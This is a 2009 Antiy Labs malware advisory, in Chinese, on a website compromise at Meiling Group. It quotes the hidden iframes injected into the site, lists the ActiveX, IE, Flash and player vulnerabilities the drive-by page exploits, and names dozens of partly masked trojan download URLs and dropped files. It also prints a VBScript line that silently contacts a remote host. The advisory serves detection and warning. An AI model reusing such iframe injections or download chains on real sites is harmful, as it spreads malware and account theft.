美菱集团挂马事件

    网络信息安全是一个博大精深的技术体系，安天将自己的注意力专注于主要矛盾，即计算机网络病毒问题。
    根据有关机构统计，全球超过80%的安全事件均与病毒有关，网络病毒是信息社会面临的主要安全挑战之一，因此，安天人将“天下无毒”作为自己追求的安全境界。
    安天将网络安全工作者的宏观视野与反病毒工程师的成熟细腻有机结合。将反病毒技术与网络监控技术、计算机犯罪取证技术、安全评估技术等进行了有机的结合，形成了自身的产品内涵。


	当前位置：首页 - 安全响应中心 -> 病毒预警

出处：安天实验室时间：2009年7月3日

2009年7月3日上午11时，安天实验室发现，美菱集团(http://www.meilinggroup.com)，被黑客植入恶意代码，用户如果访问该网站，系统会自动打开多个广告网页，还会从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制，盗取用户敏感信息。甚至导致死机。
美菱集团挂马页面：

<IFRaME src=\"http://www.zhpp***.org.cn/ppgl/ppzc/xx.htm\" width=50 height=0><\/IFRAME>
http://www.zhpp***.org.cn/ppgl/ppzc/xx.htm问题框架代码：

<IFRaME src=\"http://g459h.8866***.org/aa/a3.htm?xcxc\" width=50 height=0><\/IFRAME>
http://g459h.8866***.org/aa/a3.htm?xcxc\问题框架代码：

该挂马网页利用以下漏洞进行传播：
ActiveX控件漏洞
MS06-014漏洞
Adobe Flash Player SWF文件漏洞
Qvod Player漏洞
暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞
Real Networks RealPlayer 'rmoc3260.dll' ActiveX控件内存破坏漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
MS08-041漏洞
MS09-002漏洞
漏洞信息与描述：
Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码（MS06-014）
受影响系统：
Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows 98
Microsoft Windows 98 Second Edition (SE)、
Microsoft Windows Millennium Edition (ME)
Microsoft Windows 2000 Service Pack 4
描述和解决方案：
Microsoft已经发布了安全公告和相应补丁：
链接：http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx
Snapshot Viewer for Microsoft Access 的 ActiveX 控件中的漏洞可能允许远程执行代码（MS08-041）
受影响版本：
Microsoft Office Access 2000 Service Pack 3
Microsoft Office Access 2002 Service Pack 3
Microsoft Office Access 2003 Service Pack 2
Microsoft Office Access 2003 Service Pack 3
描述和解决方案：
Microsoft已经发布了安全公告和相应补丁：
链接：http://www.microsoft.com/china/technet/security/bulletin/ms08-041.mspx
Microsoft Internet Explorer未初始化的内存损坏漏洞（MS09-002）
受影响版本：
Microsoft Internet Explorer 7.0
描述和解决方案：
Microsoft已经发布了安全公告和相应补丁：
链接：http://www.microsoft.com/china/technet/security/bulletin/MS09-002.mspx
MS09-002 IE7 漏洞原理分析：
链接：http://www.antiy.com/cn/security/2009/s090220_002.htm
Adobe Flash Player SWF文件漏洞
受影响版本：
Adobe Flash Player 9.0.115.0以及以前的版本
描述和解决方案：
Adobe已经发布了安全公告和相应补丁：
链接：http://www.adobe.com/support/security/bulletins/apsb08-11.html
Qvod Player QvodInsert.dll ActiveX控件远程代码执行漏洞
受影响版本：
Qvod Player 2.x
描述和解决方案：
升级到最新版本：
链接：http://update.qvod.com/QvodSetup.exe
暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞
受影响版本：
暴风影音2009 <=[3.09.04.17]
描述和解决方案：
请参看安天实验室提供的具体解决方案：
http://www.antiy.com/cn/security/2009/s090504_003.htm
Real Networks RealPlayer 'rmoc3260.dll' ActiveX控件内存破坏漏洞
受影响版本：
Real Networks rmoc3260.dll 6.0.10 45
Real Networks RealPlayer 11
描述：
Real Networks RealPlayer是一款流行的媒体播放程序。Real Networks RealPlayer包含的'rmoc3260.dll' ActiveX控件存在内存破坏问题，远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。问题存在于'rmoc3260.dll' ActiveX控件，版本为6.0.10.4。可能导致在释放后修改堆块，并覆盖部分寄存器，允许任意代码执行。
目前没有官方解决方案提供：
http://www.real.com/

当用户访问挂马网站，系统会自动下载病毒文件：
1、网页木马直接下载的病毒文件：
http://milllk***.com/wm/svchost.exe 病毒名：Trojan/Win32.Mudrop.awn[Dropper]
2、病毒读取网络下载列表地址：
http://59.34.197.***/360/aa1dfh.txt
3、由下载者木马下载的其他病毒文件：
http://havvvha***.com/xiao/aa1.exe 病毒名：Trojan/Win32.Magania.biht[GameThief]
描述：梦幻西游盗号木马
衍生文件：
c:\WINDOWS\system32\kSVHjMeWr5ZZY47.dll
c:\WINDOWS\Fonts\F5hFtXrw8.Ttf

http://havvvha***.com/xiao/aa2.exe 病毒名：Trojan/Win32.Magania.bjsy[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\EN7hzSreCat8.dll
c:\WINDOWS\system32\dfc8ac3ed7da.dll
c:\WINDOWS\system32\comres.dll
c:\WINDOWS\Fonts\R6WhWBmZsEdPZDjQP.Ttf

http://havvvha***.com/xiao/aa3.exe 病毒名：Trojan/Win32.Magania.biht[GameThief]
描述：封神榜?网络版游戏盗号木马
衍生文件：
c:\WINDOWS\system32\JPccCJnKygDdp3.dll
c:\WINDOWS\Fonts\uawyv9Pr.Ttf

http://havvvha***.com/xiao/aa4.exe 病毒名：Trojan/Win32.Magania.bfwc[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\t44y9a553NQ.dll
c:\WINDOWS\Fonts\DvmYQCxb7hEXNvF4.Ttf

http://havvvha***.com/xiao/aa5.exe 病毒名：Trojan/Win32.Magania.biht[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\Fonts\ke8DSzt4WWjCBJxw.Ttf
c:\WINDOWS\Fonts\rVT7yuNguG3.fon

http://havvvha***.com/xiao/aa6.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
描述：魔兽世界游戏盗号木马
衍生文件：
c:\WINDOWS\system32\DcXb7abe.dll
c:\WINDOWS\Fonts\yfNYEayB2XMhmnkb.Ttf

http://havvvha***.com/xiao/aa7.exe 病毒名：Trojan/Win32.Magania.bisf[GameThief]
描述：《奇侠》游戏盗号木马
衍生文件：
c:\WINDOWS\system32\JGxmCj7bYHHbwtxt.dll
c:\WINDOWS\Fonts\RAU8zPSxVs.Ttf

http://havvvha***.com/xiao/aa8.exe 病毒名：Trojan/Win32.Magania.bfwc[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\ZfbJ9AWwU.dll
c:\WINDOWS\Fonts\stcfZy8RUhD6XqM4.Ttf

http://havvvha***.com/xiao/aa9.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
描述：剑侠世界游戏盗号木马
衍生文件：
c:\WINDOWS\system32\skcfujQ5EDN.dll
c:\WINDOWS\Fonts\YywxhF7TSnkktrJw.Ttf

http://havvvha***.com/xiao/aa10.exe 病毒名：Trojan/Win32.Magania.bfws[GameThief]
描述：大话西游3游戏盗号木马
衍生文件：
c:\WINDOWS\system32\ndxq9awMc.dll
c:\WINDOWS\Fonts\CRp3uYCmcxMp3qQn9.Ttf

http://havvvha***.com/xiao/aa11.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\taNjsFa2tT2Dh.dll
c:\WINDOWS\Fonts\RCZbVbjCY6wYszD3.Ttf

http://havvvha***.com/xiao/aa12.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\704C3595.dll
c:\WINDOWS\Fonts\S8a8cnEuaydPJGg8.Ttf

http://havvvha***.com/xiao/aa13.exe 病毒名：Trojan/Win32.Magania.bfdq[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\E4814792.dll
c:\WINDOWS\Fonts\EEUJgNKN6xmNqKr6.Ttf

http://havvvha***.com/xiao/aa14.exe 病毒名：Trojan/Win32.Magania.bful[GameThief]
描述：传奇游戏盗号木马
衍生文件：
c:\WINDOWS\Fonts\MhaUKGazkr3fZZKp.Ttf
c:\WINDOWS\Fonts\fyrwJf5Qfhh.fon

http://havvvha***.com/xiao/aa15.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
描述：诛仙游戏盗号木马
衍生文件：
c:\WINDOWS\system32\A0C86020.dll
c:\WINDOWS\Fonts\6e6EUdxVeWUYJynN.Ttf

http://havvvha***.com/xiao/aa16.exe 病毒名：Trojan/Win32.Magania.biht[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\Fonts\BqfKfz6gSK.Ttf
c:\WINDOWS\Fonts\zAPWgSjGrSpdsE4.fon

http://havvvha***.com/xiao/aa17.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\qB5BKZy7vR5m.dll
c:\WINDOWS\Fonts\PeMTdMfqzpGTb5ps.Ttf

http://havvvha***.com/xiao/aa18.exe 病毒名：Trojan/Win32.Magania.bfsy[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\Fonts\JNwybEjgUVaxBU5d.Ttf
c:\WINDOWS\Fonts\CESPVP8FQd.fon

http://havvvha***.com/xiao/aa19.exe 病毒名：Trojan/Win32.Magania.bfsy[GameThief]
描述：QQ厦华游戏盗号木马
衍生文件：
c:\WINDOWS\Fonts\pDuuqr4BgFn65AeW.Ttf
c:\WINDOWS\Fonts\vwuXtYbhj.fon

http://havvvha***.com/xiao/aa20.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\Fonts\T4HyJ7uGEauA.Ttf
c:\WINDOWS\Fonts\MqppW9KYn.fon

http://havvvha***.com/xiao/aa21.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
描述：魔域游戏盗号木马
衍生文件：
c:\WINDOWS\system32\08223B03.dll
c:\WINDOWS\Fonts\eCgMhGRkPUcdutd0.Ttf

http://havvvha***.com/xiao/aa22.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
描述：诛仙游戏盗号木马
衍生文件：
c:\WINDOWS\system32\122B901E.dll
c:\WINDOWS\Fonts\cFDPmh3MDPjcHMPd.Ttf

http://havvvha***.com/xiao/aa23.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
描述：诛仙游戏盗号木马
衍生文件：
c:\WINDOWS\system32\dhDhwS7fFW.dll
c:\WINDOWS\Fonts\cD9KArZZUHxCqnyM.Ttf

http://havvvha***.com/xiao/aa24.exe 病毒名：Trojan/Win32.Magania.bkcz[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\Va7SpUWgCA5f.dll
c:\WINDOWS\Fonts\FCvvnT2B.Ttf

http://havvvha***.com/xiao/aa25.exe 病毒名：Trojan/Win32.Magania.bful[GameThief]
描述：封神榜?网络版游戏盗号木马
衍生文件：
c:\WINDOWS\Fonts\EHMs25j4ArEwPKHS.Ttf
c:\WINDOWS\Fonts\vgUGf6VF2E.fon

http://havvvha***.com/xiao/aa26.exe 病毒名：Trojan/Win32.Magania.biht[GameThief]
描述：封神榜?网络版游戏盗号木马
衍生文件：
c:\WINDOWS\system32\ybM7kf9heVHDx.dll
c:\WINDOWS\Fonts\EcZFMzAp3.Ttf

http://havvvha***.com/xiao/aa27.exe 病毒名：Trojan/Win32.Magania.bful[GameThief]
描述：传奇外传游戏盗号木马
衍生文件：
c:\WINDOWS\Fonts\du3Q2JXbHYGxcSAe.Ttf
c:\WINDOWS\Fonts\tY5UFS434YYd.fon

http://havvvha***.com/xiao/aa28.exe 病毒名：Trojan/Win32.Magania.bfwc[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\GU6f5sW42mdc.dll
c:\WINDOWS\Fonts\avJ9SdDwMd9Qzt.Ttf

http://havvvha***.com/xiao/aa29.exe Trojan/Win32.Magania.bfrp[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\2EF0D734.dll
c:\WINDOWS\Fonts\Qq3qg7RGSp9raxWW.Ttf

http://havvvha***.com/xiao/aa30.exe 病毒名：Trojan/Win32.Magania.biht[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\RhdwE8NYdbqQ.dll
c:\WINDOWS\Fonts\BqfKfz6gSK.Ttf

http://havvvha***.com/xiao/aa31.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\KnSBC7Rm.dll
c:\WINDOWS\Fonts\eJKq8eAyK5D8UNA5.Ttf

http://havvvha***.com/xiao/aa32.exe 病毒名：Trojan/Win32.Magania.biht[GameThief]
描述：梦幻西游online游戏盗号木马
衍生文件：
c:\WINDOWS\Fonts\F5hFtXrw8.Ttf
c:\WINDOWS\Fonts\xbpCfXnG6wUVF.fon

http://havvvha***.com/xiao/aa33.exe 病毒名：Trojan/Win32.OnLineGames.bmiz[GameThief]
描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\usbvmx.dll
c:\WINDOWS\system32\ed78ab9.dll
c:\WINDOWS\Fonts\yGMHUAj5Npydj8FZ.ttf

http://havvvha***.com/xiao/aa34.exe 病毒名：Trojan/Win32.Agent.cnxi
描述：钓鱼木马伪装QQ官方发布中奖信息
衍生文件：
c:\WINDOWS\system32\qqcv2009.cn

http://havvvha***.com/xiao/aa35.exe 病毒名：Trojan/Win32.OnLineGames.bmiy[GameThief]
描述：QQ盗号木马
衍生文件：
c:\Documents and Settings\a\Application Data\Spy9.dll
c:\Documents and Settings\a\Application Data\Spy9.tmp
c:\Documents and Settings\a\Application Data\Reg0.bak

http://havvvha***.com/xiao/aa36.exe 链接失效

http://havvvha***.com/xiao/1.exe 病毒名：Trojan/VBS.IEstart.e
描述：利用脚本执行命令：
vbscript:CreateObject("WScript.Shell").Run("iexplore http://tj.mehoab***.com/bb/tj1jdoiash.htm",0)(window.close)连接该域名地址发送安装统计信息
衍生文件：无

安天反病毒工程师建议：
1.使用安天防线或锐甲可以有效防范此挂马网页。
2.使用安天防线可以查杀此挂马网页下载的病毒文件。
3.请及时更新安天防线，以确保您的计算机安全，防止计算机病毒入侵。如未安装安天防线请点击此处(http://www.antiyfx.com)免费下载最新版安天防线来防止病毒入侵。